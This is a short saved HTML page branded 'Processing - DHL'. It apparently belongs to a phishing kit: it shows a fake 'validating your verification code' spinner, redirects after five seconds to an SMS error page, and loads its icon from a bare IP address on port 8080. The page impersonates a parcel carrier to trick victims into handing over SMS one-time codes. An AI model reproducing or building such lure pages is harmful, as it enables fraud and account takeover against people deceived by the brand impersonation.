<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Processing - DHL</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="robots" content="nofollow,noindex">
<link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="./waiting_files/css2" rel="stylesheet">
<link rel="stylesheet" href="./waiting_files/style.css">
<link rel="icon" href="http://160.172.222.172:8080/source/res/icon.png">
<script src="./waiting_files/jq.js.download"></script>
<script src="./waiting_files/arr.js.download"></script>

</head>
<body>
 

<div class="windowloader" id="loader">
<div class="wl-content">
<div style="text-align:center; display:flex; flex-direction:column; align-items:center">
<div class="loader">
</div>

<p style="padding:0 10px;">Please wait while we validate your verification code!</p>


</div>
</div>
</div>

<script>
         setTimeout(function(){
         	var Url = 'sms-error.html';

            window.location.replace(Url); 
         }, 5000);
</script>

</body></html>